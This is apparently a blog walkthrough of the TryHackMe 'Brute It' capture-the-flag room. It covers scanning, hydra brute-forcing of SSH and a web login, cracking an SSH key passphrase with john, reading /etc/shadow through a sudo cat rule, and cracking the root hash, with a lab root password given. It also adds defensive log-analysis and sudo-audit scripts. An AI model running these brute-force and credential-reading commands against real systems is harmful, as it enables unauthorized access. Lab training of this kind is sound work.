Challenges: Brute It (TryHackMe)

Jebitok

In this box, we walk through a hands-on experience of a basic CTF-style Linux machine, where we explore critical concepts useful for real-world penetration testing and OSCP prep. The focus is on:

  • Reconnaissance using tools like nmap and gobuster

  • Brute-force attacks on both SSH and web login forms using hydra

  • Cracking private key passphrases with john

  • Privilege escalation by analyzing sudo permissions and cracking shadow file hashes

Throughout the room, we sharpen our understanding of attack surfaces exposed via web services, and practice chaining small wins, from login panels to shell access, into full system compromise.

Whether you're a beginner learning the ropes or someone brushing up before an exam, this room will help solidify your offensive security fundamentals.

About this box

In this box you will learn about:

- Brute-force

- Hash cracking

- Privilege escalation

Connect to the TryHackMe network, and deploy the machine.

Answer the questions below

Deploy the machine

Reconnaissance

Before attacking, let's gather information about the target.

Answer the questions below

Search for open ports using nmap.

nmap -p- -sC -sV IP_Address

  1. How many ports are open?

  2. What version of SSH is running?

  3. What version of Apache is running?

  4. Which Linux distribution is running?

  5. Search for hidden directories on web server.
    What is the hidden directory?

    gobuster dir -u IP_Address -w /usr/share/wordlists/dirb/common.txt

Take note of a user called john; it will be important.

gobuster dir -u IP_Address/admin/ -w /usr/share/wordlists/dirb/common.txt

Getting a shell

Find a form to get a shell on SSH.

Answer the questions below

  1. What is the user:password of the admin panel?

    I tried using hydra in this way:

    hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://IP_Address
    hydra -l admin -P /usr/share/wordlists/fasttrack.txt ssh://IP_Address

    hydra -L /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -P /usr/share/wordlists/rockyou.txt ssh://IP_Address

    That didn't work, so I went back to the site to try logging in using the username admin and random passwords.

    the login form:

After attempting to log in with a random password and our given username, admin, the Request view of the browser's Network tab shows the login form fields user and pass.

hydra -l admin -P /usr/share/wordlists/rockyou.txt IP_Address http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid"

  • /admin/index.php → the login page URL.

  • user=^USER^&pass=^PASS^ → the exact POST body format, using the input field names from the form. Hydra substitutes ^USER^ and ^PASS^ as it tries each combo.

  • F=Username or password invalid → tells Hydra what failure message to look for in the response. If it doesn't find this string, it assumes login was successful.
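Seen from the server side, the attempt above is a burst of POSTs to /admin/index.php from one client. The access log does not record the response body, so the failure string Hydra matches on is not available there; counting login POSTs per client in a sliding window is the usual signal. This is an added example, not part of the original write-up: the log lines are constructed, the threshold and window are assumed values to tune, and each client's lines are assumed to be in chronological order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache common/combined log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def sample_log():
    """Constructed log lines (documentation-range IPs), not taken from the box."""
    fmt = '{ip} - - [12/May/2025:10:{m:02d}:{s:02d} +0000] "{req} HTTP/1.1" 200 671'
    post = "POST /admin/index.php"
    # A wordlist run: twelve login POSTs in twelve seconds.
    lines = [fmt.format(ip="198.51.100.7", m=0, s=s, req=post) for s in range(12)]
    # A slow client: ten POSTs, two minutes apart, never ten inside one window.
    lines += [fmt.format(ip="192.0.2.5", m=2 * i, s=0, req=post) for i in range(10)]
    # An ordinary visitor: one page load and two login attempts.
    lines.append(fmt.format(ip="203.0.113.20", m=5, s=0, req="GET /admin/"))
    lines += [fmt.format(ip="203.0.113.20", m=5, s=s, req=post) for s in (10, 40)]
    return lines

def find_bruteforce(lines, path="/admin/index.php", threshold=10,
                    window=timedelta(seconds=60)):
    """Return {client_ip: peak POST count inside `window`} for clients at or above threshold."""
    recent = defaultdict(deque)   # per-client timestamps still inside the window
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # skip lines that are not in the expected format
        ip, ts, method, url, _status = m.groups()
        if method != "POST" or url.split("?", 1)[0] != path:
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        q.append(when)
        while when - q[0] > window:   # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

if __name__ == "__main__":
    for ip, count in find_bruteforce(sample_log()).items():
        print(f"{ip}: {count} login POSTs within 60 s")
```

The slow client in the sample stays under the threshold, which is why rate alerts are normally paired with account lockout or per-account attempt limits on the form itself.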

the output

  1. Crack the RSA key you found.
    What is John's RSA Private Key passphrase?

    You'll find the id_rsa here: http://10.10.107.134/admin/panel/id_rsa. Create a file to paste it into:

    nano id_rsa

    /opt/john/ssh2john.py id_rsa > hash.txt

    john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

  2. user.txt

    chmod 600 id_rsa

    ssh -i id_rsa john@IP_Address

    find / -type f -name user.txt 2> /dev/null

  3. Web flag

    You'll find the web flag here: http://10.10.107.134/admin/panel/id_rsa.

Privilege Escalation

Now, we need to escalate our privileges.

Answer the questions below

Find a form to escalate your privileges.

  1. What is the root's password? football

    sudo /bin/cat /etc/shadow

    # Single quotes stop the shell from expanding $6, $aReallyHardSalt, ... as variables.
    echo '$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.' > hash11.txt
    grep -E '^[a-z]{8}$' /usr/share/wordlists/rockyou.txt > 8_letter_words.txt

    hashcat -m 1800 -a 0 hash11.txt 8_letter_words.txt

    # The same crack with john, using the files created above.
    john --format=sha512crypt --wordlist=8_letter_words.txt hash11.txt

  1. root.txt
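The escalation above works because john is allowed to run /bin/cat through sudo with no restriction on its arguments, so any root-only file, /etc/shadow included, can be read. As an added example (not part of the original write-up), the following audit flags that class of rule in `sudo -l` output; the sample output, the host name and the reader list are constructed for illustration.

```python
import re

# Programs whose whole purpose is to print file contents (non-exhaustive list).
FILE_READERS = {"cat", "tac", "head", "tail", "less", "more", "nl",
                "strings", "xxd", "base64"}

# A rule line in `sudo -l` output: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

# Constructed `sudo -l` output; host name and rules are made up for the example.
SAMPLE = """\
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
    (root) /usr/bin/systemctl restart apache2, /usr/bin/tail /var/log/apache2/*
    (www-data) NOPASSWD: /bin/cat
"""

def audit_sudo_l(output):
    """Return (command, reason, nopasswd) for rules that expose root-only files."""
    findings = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        if runas.split(":")[0].strip() not in ("root", "ALL"):
            continue                      # only rules that run as root matter here
        nopasswd = "NOPASSWD:" in tags
        for cmd in (c.strip() for c in cmds.split(",")):
            parts = cmd.split()
            if not parts:
                continue
            name = parts[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((cmd, "any command as root", nopasswd))
            elif name in FILE_READERS and len(parts) == 1:
                # No arguments listed in sudoers means any arguments are allowed.
                findings.append((cmd, "reads any file as root", nopasswd))
            elif name in FILE_READERS and any(ch in cmd for ch in "*?["):
                findings.append((cmd, "wildcard in file arguments", nopasswd))
    return findings

if __name__ == "__main__":
    for cmd, reason, nopasswd in audit_sudo_l(SAMPLE):
        print(f"{cmd}: {reason}" + (" (NOPASSWD)" if nopasswd else ""))
```

The fix for a flagged rule is to remove it or pin it to the exact file the user needs, for example a single log path with no wildcard.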

This box reinforced essential skills for attacking Linux systems:

  • We started with enumeration using nmap and gobuster, uncovering both open ports and hidden directories.

  • We used hydra to brute-force both web login forms and SSH authentication, demonstrating how critical weak credentials can be.

  • We learned to convert private SSH keys into a hash format readable by john, and crack the passphrase to gain shell access.

  • For privilege escalation, we explored the power of sudo misconfigurations and cracked a hashed root password using hashcat.

By the end of this room, we captured all the flags, from web to user to root, and gained a better appreciation for how multiple weak points can be exploited to take control of a system.

Keep practicing, stay curious, and always document your learning journey. On to the next challenge!
